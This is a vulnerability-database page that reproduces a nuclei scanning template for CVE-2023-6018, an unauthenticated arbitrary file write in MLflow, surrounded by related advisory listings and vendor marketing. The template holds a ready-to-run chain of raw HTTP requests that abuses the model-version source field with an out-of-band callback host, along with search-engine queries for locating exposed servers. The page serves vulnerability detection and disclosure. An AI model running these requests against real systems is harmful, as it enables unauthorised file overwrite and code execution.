Lucene search
K

Mlflow - Arbitrary File Write

🗓️ 03 Jul 2026 13:39:16Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 53 Views

Mlflow Arbitrary File Write without authenticatio

Related
Refs
Code
ReporterTitlePublishedViews
Family
CNNVD
Mlflow Security Vulnerabilities
16 Nov 202300:00
cnnvd
CVE
CVE-2023-6018
16 Nov 202316:05
cve
Cvelist
CVE-2023-6018 MLflow Arbitrary File Write
16 Nov 202316:05
cvelist
Github Security Blog
Remote Code Execution due to Full Controled File Write in mlflow
16 Nov 202318:30
github
NVD
CVE-2023-6018
16 Nov 202316:15
nvd
OSV
BIT-MLFLOW-2023-6018
6 Mar 202410:57
osv
OSV
CVE-2023-6018
16 Nov 202316:15
osv
OSV
GHSA-5P3H-7FWH-92RC Remote Code Execution due to Full Controled File Write in mlflow
16 Nov 202318:30
osv
OSV
MINI-37FX-9FMQ-2W5F
18 Jun 202611:52
osv
OSV
PYSEC-2026-417 Remote Code Execution due to Full Controled File Write in mlflow
29 Jun 202611:50
osv
Rows per page
id: CVE-2023-6018

info:
  name: Mlflow - Arbitrary File Write
  author: byt3bl33d3r
  severity: critical
  description: |
    An attacker can overwrite any file on the server hosting MLflow without any authentication.
  impact: |
    Unauthenticated attackers can overwrite any file on the server hosting MLflow, potentially compromising system integrity and enabling remote code execution.
  remediation: |
    Secure the MLflow instance by implementing authentication and access controls, and update to the latest patched version.
  reference:
    - https://huntr.com/bounties/7cf918b5-43f4-48c0-a371-4d963ce69b30/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-6018
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-6018
    cwe-id: CWE-78
    epss-score: 0.47874
    epss-percentile: 0.98709
    cpe: cpe:2.3:a:lfprojects:mlflow:-:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 4
    vendor: lfprojects
    product: mlflow
    shodan-query: http.title:"mlflow"
    fofa-query:
      - title="mlflow"
      - app="mlflow"
    google-query: intitle:"mlflow"
  tags: cve,cve2023,mlflow,oss,rce,intrusive,lfprojects,vuln
variables:
  model_name: "{{rand_text_alpha(6)}}"

http:
  - raw:
      - |
        POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"name": "{{model_name}}"}

      - |
        POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"name": "{{model_name}}", "source": "http://{{interactsh-url}}/api/2.0/mlflow-artifacts/artifacts/"}

      - |
        POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"name": "{{model_name}}", "source": "models:/{{model_name}}/1"}

      - |
        GET /model-versions/get-artifact?path=random&name={{model_name}}&version=2 HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: word
        part: body_1
        words:
          - '"registered_model":'
          - '"name":'
        condition: and
# digest: 4b0a00483046022100ddc7516d6e2f60815c9feaea861231f436f362f0f845a7467aa4d1f9257d0d4e02210085b29c512a77ae34196444938183f61bdc2eebb480d3d3561726b61ef2e54c6c:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.2High risk
Vulners AI Score7.2
CVSS 3.19.8
CVSS 310
EPSS0.47874
53